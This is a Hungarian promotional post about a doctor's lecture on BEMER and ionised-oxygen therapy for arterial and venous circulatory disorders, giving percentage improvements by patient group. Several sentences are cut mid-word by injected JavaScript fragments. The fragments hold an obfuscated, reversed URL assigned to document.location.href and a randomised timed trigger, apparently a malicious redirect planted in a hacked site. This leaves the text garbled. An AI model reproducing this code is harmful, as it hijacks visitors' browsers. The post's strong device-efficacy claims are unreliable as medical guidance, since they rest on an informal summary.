Olyan szakorvos előadásról írok, aki nemcsak kiváló szakember, hanem rendkívül jó humorú előadó is. Olyan orvos, aki nem tartja, csodagépnek a BEMER eszközöket, viszont a helyén kezeli, a BEMER terápiát és ezért is ilyen sikeres a munkájában. Hitelessége számomra azt jelenti, hogy egyik nagyon közeli hozzátartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozómat hozzá vittem műtétre.

Bemer

Dr. Rozsos István érsebész főorvos úr előadásában elmondta, hogy a keringési zavartól szenvedő betegeknél alkalmazott hagyományos gyógyszeres és infúziós kezelések nem mindig eredményeznek megfelelő javulást. Ha valamelyik szakorvos ismeri a BEMER terápiát, azonnal van hova nyúlnia és akár kiegészítésként, akár önálló terápiaként alkalmazzák a BEMER-t.

A hatékonyság feltétele a megfelelő diagnosztika és a kezelések ismerete és a megfelelő terápia alkalmazása.

Bemer kezelés

Alkalmazott módszerek, amit Rozsos főorvos úr elmondott:

Több betegnél alkalmazták a BEMER és a Precise 6000 ionizált oxigén terápiás beavatkozásokat a beállítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott gyógyszeres kezelések mellett több ütőeres keringési zavartól szenvedő betegcsoportnál.

bemer1. Krónikus – kritikus végtag iszkémiás betegeken
2. Kritikus végtag-iszkémiás betegeken-trofikus zavarral
3. cukorbetegség mellett kialakult trofikus zavar esetén
4. a vénás keringési zavar esetén csak BEMER kezelést alkalmaztak

Eredmények:

1. Klaudikáló csoportnál a panaszfokozódás miatt kezdték el a kezeléseket- kiindulási érték átlaga 25-28Hgmm- és a BEMER kezelés után 28%-os javulást mértek + az oxigénkezelés után 59%-os oxigén tenzio növekedést tapasztaltak

2. Klaudikáló-trofikus zavarral küzdő csoport kiindulási érték átlaga 20-26Hgmm- és a BEMER kezelés után 32 %-os javulást mértek + az oxigénkezelés után 75 %-os oxigén tenzio növekedést tapasztaltak

3. Cukorbeteg csoport kiindulási érték átlaga 47-58Hgmm- és a BEMER kezeléssel
11 %-os javulás történt + az oxigénkezelés után 25 %-os javulást mutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott.

4. Vénás keringési zavarral küzdő betegeknél műtéti megoldásra volt szükség.

A betegek kezelés előtti és alatti vizsgálatai mellett a kezeléseket követően a záró értékek jól mutatták a responder-non- responder állapotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat – különösen vénás betegek esetén – ahol a rossz vagy gyenge válasz reakciók a sebészeti beavatkozás szükségességére hívták fel a figyelmet

A kezelések folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos TcpO2 mérése az eredmények nyomon követésének jó módszere. Használatával hiteles monitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torozást valósíthattak meg és a végtag amputációtól elkerülését eredményezheti.

Sajnos az elmúlt években Magyarországon, éves szinten 2000 körül van az amputált végtagok száma. A fentebb leírt módszertan és BEMER terápia alkalmazásával lenne esély ezt a számot csökkenteni.